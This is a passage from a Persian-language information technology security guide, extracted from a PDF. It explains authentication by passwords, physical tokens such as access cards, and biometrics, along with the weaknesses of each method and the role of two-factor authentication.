‫ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤﺨﻮﺍﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻓﺮﺽ ﺑﺮ ﺁﻥ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻓﺮﺩ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﭼﻮﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﻪ ﻫﻴﭻ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ‪ ،‬ﻫﻤﭽﻨـﺎﻥ ﭘـﺮ ﺍﺳـﺘﻔﺎﺩﻩﺗـﺮﻳﻦ‬
‫ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺟﻬﺎﻥ ﺍﻣﺮﻭﺯ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﺔ ﺍﻳﻦ ﺭﻭﺍﺝ ﺯﻳﺎﺩ‪ ،‬ﺍﻛﺜﺮ ﻣـﺎ ﺍﻛﻨـﻮﻥ ﺩﻫﻬـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺩﺍﺭﻳﻢ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻪﺭﻭﺯﻩ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻳﺎﺩ ﺑﻴﺎﻭﺭﻳﻢ؛ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ )‪PIN‬ﻫﺎ(‪ ١٢٦،‬ﺭﻣﺰﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ‬
‫‪ ،ATM‬ﻛﺎﺭﺗﻬﺎﻱ ﺗﻤﺎﺱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ ﻭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﭘﺎﺳـﺨﮕﻮ‪ ،‬ﺑـﺎﺯﻛﺮﺩﻥ ﻗﻔـﻞ ﺗﻠﻔﻨﻬـﺎﻱ ﺳـﻴﺎﺭ‪ ،‬ﺑـﺎﺯﻛﺮﺩﻥ ﻗﻔـﻞ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ‪ ،‬ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻠﻔﻨﻲ‪ ،‬ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ‪.‬‬
‫ﭼﻨﺪﻳﻦ ﻣﺸﻜﻞ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻗﺎﺑﻞ ﺭﻓﻊ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﮐﻪ ﺩﺭ ﺻﻔﺤﺔ ﻣﻘﺎﺑﻞ ﺁﻣﺪﻩﺍﻧﺪ‪.‬‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻮﺯﻳﻊ ﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺩﺭ ﺍﻭﻟـﻴﻦ ﻭﺭﻭﺩ‬ ‫•‬
‫ﻻ ﭘﻴﺶﻓﺮﺿﻬﺎ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ ﻭ ﻧﻴـﺰ ﻣﻤﻜـﻦ‬ ‫ﻛﺎﺭﺑﺮ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﺩﻫﻨﺪ ﺗﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﺪ‪ ،‬ﻭﻟﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ ﺍﻭﻟﻴﻦ ﻛﺎﺭﺑﺮ‪ ،‬ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﻧﺒﺎﺷﺪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳﺪﻩ ﺷﻮﻧﺪ‪ .‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﻳـﻦ‬ ‫•‬
‫ﺧﻄﺮ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﺪ‪ ،‬ﻭﻟﻲ ﺍﮔﺮ ﺷﺨﺼﻲ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﻭﺍﺭﺩ ﻛﻨﺪ ﻭ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺍﺯ ﺑـﺎﻻﻱ‬
‫ﺷﺎﻧﺔ ﺍﻭ ﺁﻧﺮﺍ ﺑﺒﻴﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻫﻴﭻ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﺭﻣﺰﻱﺳﺎﺯﻱ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺁﻥ ﻓﺮﺩ ﻧﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺍﺯ ﺣﺎﻟﺖ ﺭﻣﺰ ﺩﺭ ﺑﻴـﺎﻭﺭﺩ ﻭﺟـﻮﺩ‬
‫ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ!‬

‫‪126 Personal Identification Numbers‬‬


‫‪٣١٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﺑﺮﺍﺣﺘﻲ ﻓﺮﺍﻣﻮﺵ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻓﺮﺍﺩ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬ ‫•‬
‫ﻛﺎﺭﺑﺮﺩﻫﺎ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﻩﺗﺮﻱ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺎﻣﻨﺎﺳﺐ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺑﻞ‬
‫ﺣﺪﺱ ﻫﺴﺘﻨﺪ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ‪.‬‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﻮﻧﺪ‪ ،‬ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﻧﺒﺎﻳـﺪ‪،‬‬ ‫•‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬

‫ﻧﺸﺎﻥﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ‪ :١٢٧‬ﭼﻴﺰﻱ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‬


‫ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﻓﺮﺍﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺁﻥ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺛﺒﺎﺕ ﻛﻨﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺸﺎﻧﻬﺎ ﺍﺳﺖ ‪ -‬ﺍﺷﻴﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺁﻧﻬﺎ ﺑﻪ‬
‫ﻧﻮﻋﻲ ﻫﻮﻳﺖ ﺭﺍ ﺍﺛﺒﺎﺕ ﻣﻲﻛﻨﺪ‪ .‬ﻛﻠﻴﺪ ﺩﺭﻫﺎﻱ ﻭﺭﻭﺩﻱ ﺑﺮﺍﻱ ﻗﺮﻧﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻧﺸﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ؛ ﺩﺭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ‪ ،‬ﻛﻠﻴﺪﻫﺎﻱ ﻓﻠﺰﻱ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﺭﺗﻲ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳـﺎ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﻓﺮﻛـﺎﻧﺲ ﺭﺍﺩﻳـﻮﻳﻲ ﺗﻜﻤﻴـﻞ ﺷـﺪﻩﺍﻧـﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺗﻲ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻓﻠﺰﻱ ﺍﺭﺟﺤﻴﺖ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﻮﻥ ﻫﺮ ﻛﺎﺭﺕ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺷﻤﺎﺭﺓ ﻳﻜﺘﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑـﻪ‬
‫ﻳﻚ ﻫﻮﻳﺖ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺳﻴﺴﺘﻢ ﺩﺭ ﻋﻤﻞ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻛﺎﺭﺗﻬﺎﻱ ﻣﺠﺎﺯ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ ﺗﺎ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﺩﺭﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺭﺍ ﺑـﺎﺯ‬
‫ﻼ ﻛﺎﺭﺕ ﻳﻚ ﻣﻨﺸﻲ ﺳﻄﺢ ﭘﺎﺋﻴﻦ ﻧﺘﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺩﺭ‬ ‫ﻛﻨﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺯﻣﺎﻧﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺿﺎﻓﻪ ﻛﺮﺩ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﻣﺜ ﹰ‬
‫ﺳﺎﻋﺎﺕ ﻏﻴﺮ ﺍﺩﺍﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﺧﻂﻣﺸﻲ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ‪ :‬ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺑـﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺧـﻮﺩ ﺑـﻪ‬
‫ﻛﺎﺭﺗﻬﺎﻳﺸﺎﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ ،‬ﺑﻪ ﺳﺮﻋﺖ ﻛﺎﺭﺗﻬﺎﻳﻲ ﻛﻪ ﮔﻢ ﺷﺪﻩ ﻳﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪﺍﻧـﺪ ﺭﺍ ﮔـﺰﺍﺭﺵ ﻣـﻲﺩﻫﻨـﺪ؛ ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ ﻛـﺎﺭﺕ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻻ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﮔﺮﺩﺩ ﻭ ﺑﺴﺎﺩﮔﻲ ﻳﻚ ﻛﺎﺭﺕ ﺟﺪﻳﺪ ﺑﻪ ﺩﺍﺭﻧﺪﻩ ﺁﻥ ﺗﻌﻠﻖ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻳﻚ ﺑﻬﺒﻮﺩ ﺑـﺮﺍﻱ‬ ‫"ﮔﻤﺸﺪﻩ" ﺩﺭ ﺳﻴﺴﺘﻢ ﺛﺒﺖ ﺷﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﺍﻓﺮﺍﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻛﺪﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺨﺼﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻭﻥ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺧﻮﺩ‪ ،‬ﻣﻴﺎﻥ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ‪.‬‬
‫ﻣﺸﺎﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﻣﺸﻜﻼﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫• ﻧﺸﺎﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺛﺎﺑﺖ ﻧﻤﻲﻛﻨﻨﺪ ﻛﻪ ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ‪ .‬ﻫﺮ ﻛﺲ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﻣﺎﻟﻜﻴﺖ ﻧﺸﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧـﺪ‬
‫ﺑﻪ ﻣﻨﻄﻘﺔ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ؛‬
‫• ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻧﺸﺎﻥ ﺭﺍ ﮔﻢ ﻛﻨﺪ ﺩﻳﮕﺮ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻨﻄﻘﺔ ﻣﺤﺪﻭﺩﺷﺪﻩ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﺣﺘﻲ ﺍﮔﺮ ﻫﻮﻳﺖ ﻭﻱ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﺪ؛ ﻭ‬
‫• ﺑﻌﻀﻲ ﺍﺯ ﻧﺸﺎﻧﻬﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻳﺎ ﺟﻌﻞ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻧﺸﺎﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺍﻓﺮﺍﺩ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﻧﺸﺎﻧﻬﺎ ﺭﺍ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻻ ﺳﻴـﺴﺘﻢ ﻧـﺸﺎﻧﻬﺎ ﺑـﺎ‬


‫ﺑﻮﻳﮋﻩ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺸﺎﻥ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ ﻣﺸﻜﻞﺳﺎﺯ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﺍﻳﻤـﻦ ﻣﻌﻤـﻮ ﹰ‬
‫ﻻ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ" ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴـﺮﺩ‪.‬‬ ‫ﺑﻌﻀﻲ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﻳﮕﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺁﻣﻴﺨﻪ ﻣﻲﺷﻮﺩ ﮐﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺍﺗﺎﻕ ﻳﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻫﻢ ﻳﻚ ﻧﺸﺎﻥ ﺍﺭﺍﺋﻪ ﻛﻨﻴﺪ ﻭ ﻫﻢ ﻳﻚ ﺭﻣﺰ ﺗـﺼﺪﻳﻖ ﺍﻋﺘﺒـﺎﺭ‬
‫ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﮐﻨﻨﺪ‪.‬‬

‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ‪ :‬ﺁﻧﭽﻪ ﻛﻪ ﺷﻤﺎ ﻫﺴﺘﻴﺪ‬


‫ﺳﻮﻣﻴﻦ ﺗﻜﻨﻴﻚ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﻮﺳﻴﻠﺔ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺟﻬﺖ ﺗﻌﻴﻴﻦ ﻫﻮﻳﺖ ﺍﻓﺮﺍﺩ ﺭﻓﺘﻪﺭﻓﺘﻪ ﺭﻭﺍﺝ ﺑﻴـﺸﺘﺮﻱ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨـﺪ ﺗﻬﻴـﺔ ﻳـﻚ ﻣﻌﻴـﺎﺭ‬
‫ﻼ ﺍﺯ ﻭﻱ ﺛﺒﺖ ﺷﺪﻩ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴﻚ‪ ،‬ﻣﻌﻴﺎﺭ ﺯﻳﺴﺘﻲ )ﺑﻴﻮﻣﺘﺮﻳﻚ(‪ ١٢٨‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷـﻮﺩ‪،‬‬
‫ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺷﺨﺺ ﻭ ﻣﻘﺎﻳﺴﻪ ﺁﻥ ﺑﺎ ﺍﻃﻼﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻗﺒ ﹰ‬

‫‪127 Physical Tokens‬‬


‫‪128 Biometric‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣١٦‬‬

‫ﭼﻮﻥ ﺑﺮ ﺍﺳﺎﺱ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﭼﻴﺰﻱ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺷﺨﺺ ﺯﻧﺪﻩ ﺍﺳﺖ‪ .‬ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠﻔـﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ ،‬ﻣﺜـﻞ‬
‫ﺗﺼﺎﻭﻳﺮ ﺻﻮﺭﺕ‪ ،‬ﺷﺒﻜﻴﻪ‪ ،‬ﻋﻨﺒﻴﻪ‪ ،‬ﺍﺛﺮ ﺍﻧﮕﺸﺖ‪ ،‬ﺷﻜﻞ ﻫﻨﺪﺳﻲ ﺩﺳﺖ‪ ،‬ﺣﺎﻟﺖ ﺻﺪﺍ‪ ،‬ﺩﺳﺘﺨﻂ‪ ،‬ﻣﺸﺨﺼﺎﺕ ﺗﺎﻳﭗ‪ ،‬ﻭ ﻳﺎ ﺍﻟﮕﻮﻫﺎﻱ ‪.DNA‬‬
‫ﻓﻨﻮﻥ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ "ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ" ﻭ ﻧﻴﺰ "ﺗﺸﺨﻴﺺ ﻗﻄﻌـﻲ" ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪ :‬ﺍﻭﻟﻴﻦ ﺑﺎﺭﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﻣـﻲﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺑﻴﻮﻣﺘﺮﻳـﻚ ﺍﻭ ﺛﺒـﺖ‬
‫ﻼ ﺛﺒﺖ ﺷـﺪﻩ ﻣﻘﺎﻳـﺴﻪ ﻣـﻲﮔـﺮﺩﺩ‪ .‬ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ ﺩﺭ‬ ‫ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﻭﺭﻭﺭﺩﻫﺎﻱ ﺑﻌﺪﻱ‪ ،‬ﺑﻴﻮﻣﺘﺮﻳﻚ ﺟﺪﻳﺪ ﺑﺎ ﺁﻧﭽﻪ ﻗﺒ ﹰ‬
‫ﺗﺸﺨﻴﺺ ﻗﻄﻌﻲ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺰﺭﮒ ﺑﺮﺍﻱ ﺗﻨﺎﻇﺮ ﻧﺎﻣﻬﺎ ﺑﺎ ﺑﻴﻮﻣﺘﺮﻳﻚﻫﺎ ﺍﻳﺠﺎﺩ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ‪ ،‬ﭘﻠـﻴﺲ ﻓـﺪﺭﺍﻝ‬
‫ﺁﻣﺮﻳﻜﺎ )‪ (FBI‬ﺑﻪ ﭼﻨﻴﻦ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛﻪ ﻳﻜﻲ ﺍﺳﺎﻣﻲ ﺭﺍ ﺑﺎ ﺍﺛﺮ ﺍﻧﮕﺸﺘﺎﻥ ﻭ ﺩﻳﮕﺮﻱ ﺑﺎ ﻋﻨﺎﺻﺮ ‪ DNA‬ﺗﻄﺒﻴﻖ ﻣﻲﺩﻫﺪ‪.‬‬
